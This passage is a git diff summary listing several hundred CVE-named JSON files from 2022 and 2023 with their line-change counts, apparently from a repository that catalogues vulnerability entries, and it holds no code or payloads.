2022/CVE-2022-28672.json | 6 +- 2022/CVE-2022-2884.json | 3 +- 2022/CVE-2022-28943.json | 3 +- 2022/CVE-2022-28944.json | 3 +- 2022/CVE-2022-28986.json | 3 +- 2022/CVE-2022-29004.json | 3 +- 2022/CVE-2022-29005.json | 3 +- 2022/CVE-2022-29006.json | 3 +- 2022/CVE-2022-29007.json | 3 +- 2022/CVE-2022-29008.json | 3 +- 2022/CVE-2022-29009.json | 3 +- 2022/CVE-2022-29063.json | 3 +- 2022/CVE-2022-29072.json | 15 +- 2022/CVE-2022-29078.json | 6 +- 2022/CVE-2022-29154.json | 3 +- 2022/CVE-2022-29170.json | 3 +- 2022/CVE-2022-29221.json | 3 +- 2022/CVE-2022-29303.json | 6 +- 2022/CVE-2022-29337.json | 3 +- 2022/CVE-2022-29359.json | 3 +- 2022/CVE-2022-29361.json | 6 +- 2022/CVE-2022-29383.json | 6 +- 2022/CVE-2022-29455.json | 18 +- 2022/CVE-2022-29464.json | 87 ++- 2022/CVE-2022-29465.json | 3 +- 2022/CVE-2022-29469.json | 3 +- 2022/CVE-2022-29548.json | 3 +- 2022/CVE-2022-29551.json | 3 +- 2022/CVE-2022-29552.json | 3 +- 2022/CVE-2022-29553.json | 3 +- 2022/CVE-2022-29554.json | 3 +- 2022/CVE-2022-29581.json | 6 +- 2022/CVE-2022-29582.json | 3 +- 2022/CVE-2022-29593.json | 3 +- 2022/CVE-2022-29597.json | 3 +- 2022/CVE-2022-29598.json | 3 +- 2022/CVE-2022-29622.json | 3 +- 2022/CVE-2022-29778.json | 3 +- 2022/CVE-2022-29856.json | 3 +- 2022/CVE-2022-29885.json | 6 +- 2022/CVE-2022-2992.json | 6 +- 2022/CVE-2022-29932.json | 3 +- 2022/CVE-2022-29968.json | 3 +- 2022/CVE-2022-30006.json | 3 +- 2022/CVE-2022-30023.json | 3 +- 2022/CVE-2022-30040.json | 3 +- 2022/CVE-2022-30075.json | 9 +- 2022/CVE-2022-30114.json | 3 +- 2022/CVE-2022-30129.json | 3 +- 2022/CVE-2022-30136.json | 6 +- 2022/CVE-2022-30190.json | 252 +++++--- 2022/CVE-2022-30203.json | 3 +- 2022/CVE-2022-30206.json | 6 +- 2022/CVE-2022-30216.json | 3 +- 2022/CVE-2022-30292.json | 3 +- 2022/CVE-2022-30333.json | 15 +- 2022/CVE-2022-30489.json | 3 +- 2022/CVE-2022-30507.json | 3 +- 2022/CVE-2022-30510.json | 3 +- 2022/CVE-2022-30511.json | 3 +- 2022/CVE-2022-30512.json | 3 +- 2022/CVE-2022-30513.json | 3 +- 2022/CVE-2022-30514.json | 3 +- 2022/CVE-2022-30524.json | 3 +- 2022/CVE-2022-30525.json | 45 +- 2022/CVE-2022-30526.json | 3 +- 2022/CVE-2022-30591.json | 3 +- 2022/CVE-2022-30592.json | 3 +- 2022/CVE-2022-30594.json | 3 +- 2022/CVE-2022-30600.json | 3 +- 2022/CVE-2022-30778.json | 3 +- 2022/CVE-2022-30780.json | 6 +- 2022/CVE-2022-30781.json | 3 +- 2022/CVE-2022-30887.json | 3 +- 2022/CVE-2022-30929.json | 3 +- 2022/CVE-2022-31007.json | 3 +- 2022/CVE-2022-31061.json | 3 +- 2022/CVE-2022-31101.json | 6 +- 2022/CVE-2022-31138.json | 3 +- 2022/CVE-2022-31144.json | 3 +- 2022/CVE-2022-31181.json | 3 +- 2022/CVE-2022-31188.json | 3 +- 2022/CVE-2022-31245.json | 3 +- 2022/CVE-2022-31262.json | 3 +- 2022/CVE-2022-31269.json | 6 +- 2022/CVE-2022-31294.json | 3 +- 2022/CVE-2022-31295.json | 3 +- 2022/CVE-2022-31296.json | 3 +- 2022/CVE-2022-31297.json | 3 +- 2022/CVE-2022-31298.json | 3 +- 2022/CVE-2022-31299.json | 3 +- 2022/CVE-2022-31300.json | 3 +- 2022/CVE-2022-31301.json | 3 +- 2022/CVE-2022-31402.json | 3 +- 2022/CVE-2022-31403.json | 3 +- 2022/CVE-2022-31479.json | 3 +- 2022/CVE-2022-31499.json | 3 +- 2022/CVE-2022-31626.json | 3 +- 2022/CVE-2022-31629.json | 3 +- 2022/CVE-2022-3168.json | 3 +- 2022/CVE-2022-31691.json | 3 +- 2022/CVE-2022-31692.json | 6 +- 2022/CVE-2022-31705.json | 3 +- 2022/CVE-2022-3172.json | 3 +- 2022/CVE-2022-31749.json | 6 +- 2022/CVE-2022-31793.json | 3 +- 2022/CVE-2022-31798.json | 3 +- 2022/CVE-2022-31814.json | 24 +- 2022/CVE-2022-31854.json | 3 +- 2022/CVE-2022-31889.json | 3 +- 2022/CVE-2022-31890.json | 3 +- 2022/CVE-2022-31897.json | 3 +- 2022/CVE-2022-31898.json | 3 +- 2022/CVE-2022-31901.json | 3 +- 2022/CVE-2022-31902.json | 3 +- 2022/CVE-2022-31983.json | 3 +- 2022/CVE-2022-32013.json | 3 +- 2022/CVE-2022-32060.json | 3 +- 2022/CVE-2022-32073.json | 3 +- 2022/CVE-2022-32074.json | 3 +- 2022/CVE-2022-32114.json | 3 +- 2022/CVE-2022-32118.json | 3 +- 2022/CVE-2022-32119.json | 3 +- 2022/CVE-2022-32132.json | 3 +- 2022/CVE-2022-32199.json | 3 +- 2022/CVE-2022-32223.json | 3 +- 2022/CVE-2022-32224.json | 3 +- 2022/CVE-2022-32250.json | 12 +- 2022/CVE-2022-32532.json | 3 +- 2022/CVE-2022-32548.json | 3 +- 2022/CVE-2022-32832.json | 6 +- 2022/CVE-2022-32862.json | 3 +- 2022/CVE-2022-32883.json | 3 +- 2022/CVE-2022-32898.json | 3 +- 2022/CVE-2022-32932.json | 3 +- 2022/CVE-2022-32947.json | 3 +- 2022/CVE-2022-32988.json | 3 +- 2022/CVE-2022-33075.json | 3 +- 2022/CVE-2022-33082.json | 3 +- 2022/CVE-2022-3317.json | 3 +- 2022/CVE-2022-33174.json | 3 +- 2022/CVE-2022-3328.json | 3 +- 2022/CVE-2022-3357.json | 3 +- 2022/CVE-2022-33679.json | 12 +- 2022/CVE-2022-3368.json | 6 +- 2022/CVE-2022-33891.json | 33 +- 2022/CVE-2022-33980.json | 15 +- 2022/CVE-2022-34024.json | 3 +- 2022/CVE-2022-34169.json | 6 +- 2022/CVE-2022-34265.json | 12 +- 2022/CVE-2022-34298.json | 3 +- 2022/CVE-2022-34527.json | 3 +- 2022/CVE-2022-34556.json | 3 +- 2022/CVE-2022-3464.json | 3 +- 2022/CVE-2022-34683.json | 3 +- 2022/CVE-2022-34715.json | 3 +- 2022/CVE-2022-34718.json | 3 +- 2022/CVE-2022-34753.json | 3 +- 2022/CVE-2022-34913.json | 3 +- 2022/CVE-2022-34918.json | 15 +- 2022/CVE-2022-34919.json | 3 +- 2022/CVE-2022-34961.json | 3 +- 2022/CVE-2022-34962.json | 3 +- 2022/CVE-2022-34963.json | 3 +- 2022/CVE-2022-34970.json | 3 +- 2022/CVE-2022-35131.json | 3 +- 2022/CVE-2022-3518.json | 3 +- 2022/CVE-2022-35405.json | 3 +- 2022/CVE-2022-35411.json | 3 +- 2022/CVE-2022-35416.json | 3 +- 2022/CVE-2022-3546.json | 3 +- 2022/CVE-2022-35500.json | 3 +- 2022/CVE-2022-35501.json | 3 +- 2022/CVE-2022-35513.json | 3 +- 2022/CVE-2022-3552.json | 3 +- 2022/CVE-2022-3564.json | 3 +- 2022/CVE-2022-35649.json | 3 +- 2022/CVE-2022-35698.json | 3 +- 2022/CVE-2022-35737.json | 6 +- 2022/CVE-2022-35841.json | 3 +- 2022/CVE-2022-35899.json | 3 +- 2022/CVE-2022-3590.json | 6 +- 2022/CVE-2022-35914.json | 24 +- 2022/CVE-2022-35919.json | 3 +- 2022/CVE-2022-3602.json | 24 +- 2022/CVE-2022-36067.json | 6 +- 2022/CVE-2022-36162.json | 3 +- 2022/CVE-2022-36163.json | 3 +- 2022/CVE-2022-36193.json | 3 +- 2022/CVE-2022-36200.json | 3 +- 2022/CVE-2022-36231.json | 3 +- 2022/CVE-2022-36234.json | 3 +- 2022/CVE-2022-36267.json | 3 +- 2022/CVE-2022-36271.json | 3 +- 2022/CVE-2022-36432.json | 3 +- 2022/CVE-2022-36433.json | 3 +- 2022/CVE-2022-36446.json | 9 +- 2022/CVE-2022-36532.json | 3 +- 2022/CVE-2022-36537.json | 6 +- 2022/CVE-2022-36539.json | 3 +- 2022/CVE-2022-36553.json | 3 +- 2022/CVE-2022-3656.json | 3 +- 2022/CVE-2022-36663.json | 3 +- 2022/CVE-2022-36752.json | 3 +- 2022/CVE-2022-36779.json | 6 +- 2022/CVE-2022-36804.json | 45 +- 2022/CVE-2022-36944.json | 3 +- 2022/CVE-2022-36946.json | 6 +- 2022/CVE-2022-3699.json | 9 +- 2022/CVE-2022-37017.json | 3 +- 2022/CVE-2022-37032.json | 3 +- 2022/CVE-2022-37042.json | 9 +- 2022/CVE-2022-37177.json | 3 +- 2022/CVE-2022-37201.json | 3 +- 2022/CVE-2022-37202.json | 3 +- 2022/CVE-2022-37203.json | 3 +- 2022/CVE-2022-37204.json | 3 +- 2022/CVE-2022-37205.json | 3 +- 2022/CVE-2022-37206.json | 3 +- 2022/CVE-2022-37207.json | 3 +- 2022/CVE-2022-37208.json | 3 +- 2022/CVE-2022-37209.json | 3 +- 2022/CVE-2022-37210.json | 3 +- 2022/CVE-2022-37298.json | 3 +- 2022/CVE-2022-37332.json | 3 +- 2022/CVE-2022-37434.json | 9 +- 2022/CVE-2022-37703.json | 3 +- 2022/CVE-2022-37704.json | 3 +- 2022/CVE-2022-37705.json | 3 +- 2022/CVE-2022-37706.json | 21 +- 2022/CVE-2022-37708.json | 3 +- 2022/CVE-2022-3786.json | 3 +- 2022/CVE-2022-37969.json | 3 +- 2022/CVE-2022-38181.json | 9 +- 2022/CVE-2022-38374.json | 6 +- 2022/CVE-2022-38553.json | 3 +- 2022/CVE-2022-38577.json | 3 +- 2022/CVE-2022-38601.json | 3 +- 2022/CVE-2022-38604.json | 3 +- 2022/CVE-2022-38691.json | 3 +- 2022/CVE-2022-38694.json | 6 +- 2022/CVE-2022-38725.json | 3 +- 2022/CVE-2022-38766.json | 3 +- 2022/CVE-2022-38789.json | 3 +- 2022/CVE-2022-38813.json | 3 +- 2022/CVE-2022-3904.json | 3 +- 2022/CVE-2022-39066.json | 3 +- 2022/CVE-2022-39073.json | 3 +- 2022/CVE-2022-3910.json | 6 +- 2022/CVE-2022-39196.json | 3 +- 2022/CVE-2022-39197.json | 45 +- 2022/CVE-2022-39227.json | 6 +- 2022/CVE-2022-39253.json | 6 +- 2022/CVE-2022-39299.json | 3 +- 2022/CVE-2022-3942.json | 3 +- 2022/CVE-2022-39425.json | 3 +- 2022/CVE-2022-3949.json | 3 +- 2022/CVE-2022-39802.json | 6 +- 2022/CVE-2022-39838.json | 3 +- 2022/CVE-2022-39841.json | 3 +- 2022/CVE-2022-3992.json | 3 +- 2022/CVE-2022-39952.json | 12 +- 2022/CVE-2022-39959.json | 3 +- 2022/CVE-2022-39986.json | 6 +- 2022/CVE-2022-39987.json | 9 +- 2022/CVE-2022-40032.json | 3 +- 2022/CVE-2022-40126.json | 3 +- 2022/CVE-2022-40127.json | 6 +- 2022/CVE-2022-40140.json | 9 +- 2022/CVE-2022-40146.json | 6 +- 2022/CVE-2022-40297.json | 3 +- 2022/CVE-2022-40317.json | 3 +- 2022/CVE-2022-40347.json | 3 +- 2022/CVE-2022-40348.json | 3 +- 2022/CVE-2022-40363.json | 3 +- 2022/CVE-2022-4047.json | 6 +- 2022/CVE-2022-40470.json | 3 +- 2022/CVE-2022-40471.json | 3 +- 2022/CVE-2022-40490.json | 3 +- 2022/CVE-2022-40494.json | 3 +- 2022/CVE-2022-4060.json | 3 +- 2022/CVE-2022-4061.json | 3 +- 2022/CVE-2022-40624.json | 3 +- 2022/CVE-2022-4063.json | 3 +- 2022/CVE-2022-40634.json | 3 +- 2022/CVE-2022-40635.json | 3 +- 2022/CVE-2022-40684.json | 69 ++- 2022/CVE-2022-40687.json | 3 +- 2022/CVE-2022-40769.json | 3 +- 2022/CVE-2022-40799.json | 3 +- 2022/CVE-2022-40881.json | 3 +- 2022/CVE-2022-40916.json | 3 +- 2022/CVE-2022-4096.json | 3 +- 2022/CVE-2022-41032.json | 3 +- 2022/CVE-2022-41034.json | 3 +- 2022/CVE-2022-41040.json | 24 +- 2022/CVE-2022-41049.json | 3 +- 2022/CVE-2022-41080.json | 3 +- 2022/CVE-2022-41082.json | 21 +- 2022/CVE-2022-41099.json | 12 +- 2022/CVE-2022-41114.json | 3 +- 2022/CVE-2022-41218.json | 3 +- 2022/CVE-2022-41220.json | 3 +- 2022/CVE-2022-41272.json | 3 +- 2022/CVE-2022-41333.json | 3 +- 2022/CVE-2022-41343.json | 3 +- 2022/CVE-2022-41352.json | 12 +- 2022/CVE-2022-41358.json | 3 +- 2022/CVE-2022-41401.json | 3 +- 2022/CVE-2022-41412.json | 3 +- 2022/CVE-2022-41413.json | 3 +- 2022/CVE-2022-41445.json | 3 +- 2022/CVE-2022-41446.json | 3 +- 2022/CVE-2022-41540.json | 3 +- 2022/CVE-2022-41544.json | 6 +- 2022/CVE-2022-41622.json | 3 +- 2022/CVE-2022-41717.json | 3 +- 2022/CVE-2022-41741.json | 3 +- 2022/CVE-2022-41828.json | 3 +- 2022/CVE-2022-41852.json | 6 +- 2022/CVE-2022-41853.json | 3 +- 2022/CVE-2022-41876.json | 3 +- 2022/CVE-2022-41903.json | 3 +- 2022/CVE-2022-41923.json | 3 +- 2022/CVE-2022-41966.json | 3 +- 2022/CVE-2022-42045.json | 3 +- 2022/CVE-2022-42046.json | 3 +- 2022/CVE-2022-42094.json | 3 +- 2022/CVE-2022-42095.json | 3 +- 2022/CVE-2022-42096.json | 3 +- 2022/CVE-2022-42097.json | 3 +- 2022/CVE-2022-42098.json | 3 +- 2022/CVE-2022-42176.json | 3 +- 2022/CVE-2022-42475.json | 21 +- 2022/CVE-2022-4262.json | 9 +- 2022/CVE-2022-42703.json | 6 +- 2022/CVE-2022-42864.json | 3 +- 2022/CVE-2022-42889.json | 135 +++-- 2022/CVE-2022-42896.json | 15 +- 2022/CVE-2022-42899.json | 3 +- 2022/CVE-2022-4304.json | 3 +- 2022/CVE-2022-43096.json | 3 +- 2022/CVE-2022-43097.json | 3 +- 2022/CVE-2022-43117.json | 3 +- 2022/CVE-2022-43143.json | 3 +- 2022/CVE-2022-43144.json | 3 +- 2022/CVE-2022-43271.json | 3 +- 2022/CVE-2022-43293.json | 3 +- 2022/CVE-2022-43332.json | 3 +- 2022/CVE-2022-43343.json | 3 +- 2022/CVE-2022-43369.json | 3 +- 2022/CVE-2022-43571.json | 3 +- 2022/CVE-2022-43680.json | 6 +- 2022/CVE-2022-43684.json | 3 +- 2022/CVE-2022-43704.json | 3 +- 2022/CVE-2022-4395.json | 3 +- 2022/CVE-2022-43959.json | 3 +- 2022/CVE-2022-43980.json | 3 +- 2022/CVE-2022-44118.json | 3 +- 2022/CVE-2022-44136.json | 3 +- 2022/CVE-2022-44149.json | 6 +- 2022/CVE-2022-44183.json | 3 +- 2022/CVE-2022-44215.json | 3 +- 2022/CVE-2022-44268.json | 75 ++- 2022/CVE-2022-44276.json | 3 +- 2022/CVE-2022-44311.json | 6 +- 2022/CVE-2022-44312.json | 3 +- 2022/CVE-2022-44318.json | 3 +- 2022/CVE-2022-44569.json | 3 +- 2022/CVE-2022-44666.json | 3 +- 2022/CVE-2022-44721.json | 3 +- 2022/CVE-2022-44789.json | 3 +- 2022/CVE-2022-44830.json | 3 +- 2022/CVE-2022-44870.json | 3 +- 2022/CVE-2022-44875.json | 3 +- 2022/CVE-2022-44877.json | 27 +- 2022/CVE-2022-44900.json | 3 +- 2022/CVE-2022-45003.json | 3 +- 2022/CVE-2022-45004.json | 3 +- 2022/CVE-2022-45025.json | 6 +- 2022/CVE-2022-45047.json | 3 +- 2022/CVE-2022-45059.json | 3 +- 2022/CVE-2022-4510.json | 9 +- 2022/CVE-2022-45217.json | 3 +- 2022/CVE-2022-45265.json | 3 +- 2022/CVE-2022-45299.json | 3 +- 2022/CVE-2022-45354.json | 3 +- 2022/CVE-2022-4539.json | 3 +- 2022/CVE-2022-4543.json | 3 +- 2022/CVE-2022-45436.json | 3 +- 2022/CVE-2022-45451.json | 3 +- 2022/CVE-2022-45472.json | 3 +- 2022/CVE-2022-45477.json | 3 +- 2022/CVE-2022-45511.json | 3 +- 2022/CVE-2022-45544.json | 3 +- 2022/CVE-2022-45599.json | 3 +- 2022/CVE-2022-45600.json | 3 +- 2022/CVE-2022-45688.json | 15 +- 2022/CVE-2022-45701.json | 6 +- 2022/CVE-2022-45728.json | 3 +- 2022/CVE-2022-45729.json | 3 +- 2022/CVE-2022-45770.json | 3 +- 2022/CVE-2022-45771.json | 6 +- 2022/CVE-2022-45808.json | 3 +- 2022/CVE-2022-45934.json | 9 +- 2022/CVE-2022-45988.json | 3 +- 2022/CVE-2022-46080.json | 6 +- 2022/CVE-2022-46087.json | 3 +- 2022/CVE-2022-46104.json | 3 +- 2022/CVE-2022-4611.json | 6 +- 2022/CVE-2022-4616.json | 3 +- 2022/CVE-2022-46164.json | 3 +- 2022/CVE-2022-46166.json | 3 +- 2022/CVE-2022-46169.json | 104 ++-- 2022/CVE-2022-46175.json | 3 +- 2022/CVE-2022-46196.json | 3 +- 2022/CVE-2022-46381.json | 3 +- 2022/CVE-2022-46395.json | 9 +- 2022/CVE-2022-46463.json | 6 +- 2022/CVE-2022-46484.json | 3 +- 2022/CVE-2022-46485.json | 3 +- 2022/CVE-2022-46505.json | 3 +- 2022/CVE-2022-46604.json | 3 +- 2022/CVE-2022-46622.json | 3 +- 2022/CVE-2022-46623.json | 3 +- 2022/CVE-2022-46638.json | 3 +- 2022/CVE-2022-46689.json | 42 +- 2022/CVE-2022-46718.json | 3 +- 2022/CVE-2022-46836.json | 3 +- 2022/CVE-2022-47102.json | 3 +- 2022/CVE-2022-47130.json | 3 +- 2022/CVE-2022-47131.json | 3 +- 2022/CVE-2022-47132.json | 3 +- 2022/CVE-2022-47197.json | 6 +- 2022/CVE-2022-47373.json | 3 +- 2022/CVE-2022-47529.json | 3 +- 2022/CVE-2022-47615.json | 3 +- 2022/CVE-2022-47872.json | 3 +- 2022/CVE-2022-47909.json | 3 +- 2022/CVE-2022-47952.json | 3 +- 2022/CVE-2022-47966.json | 15 +- 2022/CVE-2022-47986.json | 9 +- 2022/CVE-2022-48150.json | 3 +- 2022/CVE-2022-48194.json | 3 +- 2022/CVE-2022-48197.json | 3 +- 2022/CVE-2022-48311.json | 3 +- 2022/CVE-2022-48429.json | 3 +- 2022/CVE-2022-48474.json | 3 +- 2022/CVE-2022-4896.json | 3 +- 2022/CVE-2022-4939.json | 3 +- 2022/CVE-2022-4944.json | 3 +- 2022/CVE-2022-5561.json | 3 +- 2022/CVE-2022-8475.json | 3 +- 2023/CVE-2023-0045.json | 6 +- 2023/CVE-2023-0099.json | 3 +- 2023/CVE-2023-0156.json | 3 +- 2023/CVE-2023-0157.json | 3 +- 2023/CVE-2023-0159.json | 3 +- 2023/CVE-2023-0179.json | 6 +- 2023/CVE-2023-0264.json | 3 +- 2023/CVE-2023-0266.json | 3 +- 2023/CVE-2023-0297.json | 18 +- 2023/CVE-2023-0315.json | 3 +- 2023/CVE-2023-0386.json | 36 +- 2023/CVE-2023-0400.json | 3 +- 2023/CVE-2023-0461.json | 3 +- 2023/CVE-2023-0464.json | 3 +- 2023/CVE-2023-0630.json | 3 +- 2023/CVE-2023-0656.json | 3 +- 2023/CVE-2023-0669.json | 15 +- 2023/CVE-2023-0748.json | 3 +- 2023/CVE-2023-08.json | 3 +- 2023/CVE-2023-0830.json | 3 +- 2023/CVE-2023-0860.json | 3 +- 2023/CVE-2023-0861.json | 3 +- 2023/CVE-2023-1112.json | 3 +- 2023/CVE-2023-1177.json | 15 +- 2023/CVE-2023-1326.json | 12 +- 2023/CVE-2023-1337.json | 3 +- 2023/CVE-2023-1389.json | 6 +- 2023/CVE-2023-1415.json | 3 +- 2023/CVE-2023-1430.json | 3 +- 2023/CVE-2023-1454.json | 21 +- 2023/CVE-2023-1488.json | 3 +- 2023/CVE-2023-1498.json | 3 +- 2023/CVE-2023-1665.json | 3 +- 2023/CVE-2023-1671.json | 9 +- 2023/CVE-2023-1698.json | 9 +- 2023/CVE-2023-1718.json | 3 +- 2023/CVE-2023-1767.json | 3 +- 2023/CVE-2023-1773.json | 3 +- 2023/CVE-2023-1829.json | 3 +- 2023/CVE-2023-1874.json | 3 +- 2023/CVE-2023-2002.json | 3 +- 2023/CVE-2023-20025.json | 3 +- 2023/CVE-2023-20048.json | 3 +- 2023/CVE-2023-20052.json | 6 +- 2023/CVE-2023-20073.json | 3 +- 2023/CVE-2023-2008.json | 3 +- 2023/CVE-2023-20110.json | 3 +- 2023/CVE-2023-20126.json | 3 +- 2023/CVE-2023-20178.json | 3 +- 2023/CVE-2023-20198.json | 75 ++- 2023/CVE-2023-20209.json | 3 +- 2023/CVE-2023-2023.json | 6 +- 2023/CVE-2023-2024.json | 3 +- 2023/CVE-2023-20273.json | 3 +- 2023/CVE-2023-2033.json | 15 +- 2023/CVE-2023-20562.json | 6 +- 2023/CVE-2023-20573.json | 3 +- 2023/CVE-2023-20593.json | 3 +- 2023/CVE-2023-20598.json | 3 +- 2023/CVE-2023-20860.json | 3 +- 2023/CVE-2023-20872.json | 3 +- 2023/CVE-2023-20887.json | 9 +- 2023/CVE-2023-20909.json | 6 +- 2023/CVE-2023-20911.json | 3 +- 2023/CVE-2023-20918.json | 6 +- 2023/CVE-2023-20921.json | 3 +- 2023/CVE-2023-20933.json | 6 +- 2023/CVE-2023-20943.json | 6 +- 2023/CVE-2023-20944.json | 6 +- 2023/CVE-2023-20945.json | 3 +- 2023/CVE-2023-20955.json | 3 +- 2023/CVE-2023-20963.json | 9 +- 2023/CVE-2023-21036.json | 12 +- 2023/CVE-2023-21086.json | 3 +- 2023/CVE-2023-21094.json | 3 +- 2023/CVE-2023-21097.json | 6 +- 2023/CVE-2023-21109.json | 6 +- 2023/CVE-2023-21118.json | 6 +- 2023/CVE-2023-2114.json | 3 +- 2023/CVE-2023-21144.json | 6 +- 2023/CVE-2023-2123.json | 3 +- 2023/CVE-2023-21238.json | 3 +- 2023/CVE-2023-21246.json | 3 +- 2023/CVE-2023-21251.json | 3 +- 2023/CVE-2023-21272.json | 6 +- 2023/CVE-2023-21275.json | 3 +- 2023/CVE-2023-21281.json | 3 +- 2023/CVE-2023-21282.json | 6 +- 2023/CVE-2023-21284.json | 3 +- 2023/CVE-2023-21285.json | 3 +- 2023/CVE-2023-21286.json | 3 +- 2023/CVE-2023-21288.json | 3 +- 2023/CVE-2023-21554.json | 6 +- 2023/CVE-2023-21560.json | 3 +- 2023/CVE-2023-21608.json | 6 +- 2023/CVE-2023-21674.json | 3 +- 2023/CVE-2023-21707.json | 3 +- 2023/CVE-2023-21716.json | 27 +- 2023/CVE-2023-21739.json | 3 +- 2023/CVE-2023-21742.json | 3 +- 2023/CVE-2023-21746.json | 3 +- 2023/CVE-2023-21752.json | 6 +- 2023/CVE-2023-21766.json | 3 +- 2023/CVE-2023-21768.json | 33 +- 2023/CVE-2023-21823.json | 3 +- 2023/CVE-2023-21837.json | 3 +- 2023/CVE-2023-21839.json | 21 +- 2023/CVE-2023-21887.json | 3 +- 2023/CVE-2023-21931.json | 3 +- 2023/CVE-2023-21939.json | 3 +- 2023/CVE-2023-21971.json | 3 +- 2023/CVE-2023-21987.json | 3 +- 2023/CVE-2023-22074.json | 3 +- 2023/CVE-2023-22098.json | 3 +- 2023/CVE-2023-2215.json | 3 +- 2023/CVE-2023-22432.json | 3 +- 2023/CVE-2023-2249.json | 3 +- 2023/CVE-2023-22490.json | 3 +- 2023/CVE-2023-22515.json | 75 ++- 2023/CVE-2023-22518.json | 21 +- 2023/CVE-2023-22524.json | 6 +- 2023/CVE-2023-22527.json | 72 ++- 2023/CVE-2023-2255.json | 6 +- 2023/CVE-2023-22551.json | 3 +- 2023/CVE-2023-22621.json | 3 +- 2023/CVE-2023-22622.json | 3 +- 2023/CVE-2023-22726.json | 3 +- 2023/CVE-2023-22809.json | 33 +- 2023/CVE-2023-22855.json | 3 +- 2023/CVE-2023-22884.json | 3 +- 2023/CVE-2023-22894.json | 3 +- 2023/CVE-2023-22906.json | 3 +- 2023/CVE-2023-22941.json | 3 +- 2023/CVE-2023-22960.json | 3 +- 2023/CVE-2023-22974.json | 3 +- 2023/CVE-2023-23138.json | 3 +- 2023/CVE-2023-23169.json | 3 +- 2023/CVE-2023-23192.json | 6 +- 2023/CVE-2023-23279.json | 3 +- 2023/CVE-2023-23333.json | 9 +- 2023/CVE-2023-23388.json | 3 +- 2023/CVE-2023-23396.json | 3 +- 2023/CVE-2023-23397.json | 87 ++- 2023/CVE-2023-23488.json | 6 +- 2023/CVE-2023-23531.json | 3 +- 2023/CVE-2023-23583.json | 3 +- 2023/CVE-2023-23607.json | 3 +- 2023/CVE-2023-23638.json | 9 +- 2023/CVE-2023-2375.json | 3 +- 2023/CVE-2023-23752.json | 144 +++-- 2023/CVE-2023-23924.json | 3 +- 2023/CVE-2023-23946.json | 3 +- 2023/CVE-2023-24044.json | 3 +- 2023/CVE-2023-24055.json | 21 +- 2023/CVE-2023-24059.json | 3 +- 2023/CVE-2023-24078.json | 9 +- 2023/CVE-2023-24100.json | 3 +- 2023/CVE-2023-24203.json | 3 +- 2023/CVE-2023-24249.json | 3 +- 2023/CVE-2023-24317.json | 3 +- 2023/CVE-2023-24329.json | 9 +- 2023/CVE-2023-2437.json | 3 +- 2023/CVE-2023-24488.json | 15 +- 2023/CVE-2023-24489.json | 6 +- 2023/CVE-2023-24517.json | 3 +- 2023/CVE-2023-24538.json | 6 +- 2023/CVE-2023-24610.json | 3 +- 2023/CVE-2023-24706.json | 3 +- 2023/CVE-2023-24709.json | 3 +- 2023/CVE-2023-24749.json | 3 +- 2023/CVE-2023-24775.json | 3 +- 2023/CVE-2023-24871.json | 3 +- 2023/CVE-2023-24955.json | 3 +- 2023/CVE-2023-24998.json | 3 +- 2023/CVE-2023-25136.json | 27 +- 2023/CVE-2023-25157.json | 18 +- 2023/CVE-2023-2516.json | 3 +- 2023/CVE-2023-25194.json | 9 +- 2023/CVE-2023-25202.json | 3 +- 2023/CVE-2023-25203.json | 3 +- 2023/CVE-2023-2523.json | 6 +- 2023/CVE-2023-25234.json | 3 +- 2023/CVE-2023-25260.json | 3 +- 2023/CVE-2023-25261.json | 3 +- 2023/CVE-2023-25262.json | 3 +- 2023/CVE-2023-25263.json | 3 +- 2023/CVE-2023-25292.json | 6 +- 2023/CVE-2023-25355.json | 3 +- 2023/CVE-2023-25581.json | 3 +- 2023/CVE-2023-25610.json | 3 +- 2023/CVE-2023-25690.json | 9 +- 2023/CVE-2023-25725.json | 3 +- 2023/CVE-2023-2579.json | 3 +- 2023/CVE-2023-25813.json | 6 +- 2023/CVE-2023-2591.json | 3 +- 2023/CVE-2023-2594.json | 3 +- 2023/CVE-2023-25950.json | 3 +- 2023/CVE-2023-2598.json | 6 +- 2023/CVE-2023-26035.json | 23 +- 2023/CVE-2023-26048.json | 6 +- 2023/CVE-2023-26049.json | 3 +- 2023/CVE-2023-26067.json | 3 +- 2023/CVE-2023-26136.json | 9 +- 2023/CVE-2023-26144.json | 3 +- 2023/CVE-2023-26255.json | 6 +- 2023/CVE-2023-26256.json | 12 +- 2023/CVE-2023-26258.json | 3 +- 2023/CVE-2023-26262.json | 3 +- 2023/CVE-2023-26269.json | 3 +- 2023/CVE-2023-2636.json | 3 +- 2023/CVE-2023-26360.json | 9 +- 2023/CVE-2023-2640.json | 21 +- 2023/CVE-2023-26469.json | 3 +- 2023/CVE-2023-2650.json | 3 +- 2023/CVE-2023-26563.json | 3 +- 2023/CVE-2023-26602.json | 3 +- 2023/CVE-2023-26607.json | 3 +- 2023/CVE-2023-26609.json | 3 +- 2023/CVE-2023-26692.json | 3 +- 2023/CVE-2023-26785.json | 3 +- 2023/CVE-2023-26818.json | 3 +- 2023/CVE-2023-26852.json | 3 +- 2023/CVE-2023-26866.json | 3 +- 2023/CVE-2023-26976.json | 3 +- 2023/CVE-2023-26982.json | 6 +- 2023/CVE-2023-26984.json | 3 +- 2023/CVE-2023-27035.json | 3 +- 2023/CVE-2023-27100.json | 6 +- 2023/CVE-2023-27163.json | 51 +- 2023/CVE-2023-27216.json | 6 +- 2023/CVE-2023-2728.json | 3 +- 2023/CVE-2023-2732.json | 9 +- 2023/CVE-2023-27326.json | 6 +- 2023/CVE-2023-27327.json | 3 +- 2023/CVE-2023-27350.json | 24 +- 2023/CVE-2023-27363.json | 9 +- 2023/CVE-2023-27372.json | 24 +- 2023/CVE-2023-2744.json | 3 +- 2023/CVE-2023-27470.json | 3 +- 2023/CVE-2023-27524.json | 36 +- 2023/CVE-2023-27532.json | 9 +- 2023/CVE-2023-27564.json | 3 +- 2023/CVE-2023-27566.json | 3 +- 2023/CVE-2023-27587.json | 3 +- 2023/CVE-2023-27703.json | 3 +- 2023/CVE-2023-27704.json | 3 +- 2023/CVE-2023-27742.json | 3 +- 2023/CVE-2023-27746.json | 3 +- 2023/CVE-2023-27842.json | 6 +- 2023/CVE-2023-27997.json | 24 +- 2023/CVE-2023-28121.json | 18 +- 2023/CVE-2023-28197.json | 3 +- 2023/CVE-2023-28206.json | 3 +- 2023/CVE-2023-28218.json | 3 +- 2023/CVE-2023-2822.json | 3 +- 2023/CVE-2023-28229.json | 6 +- 2023/CVE-2023-28231.json | 3 +- 2023/CVE-2023-28244.json | 3 +- 2023/CVE-2023-2825.json | 18 +- 2023/CVE-2023-28252.json | 21 +- 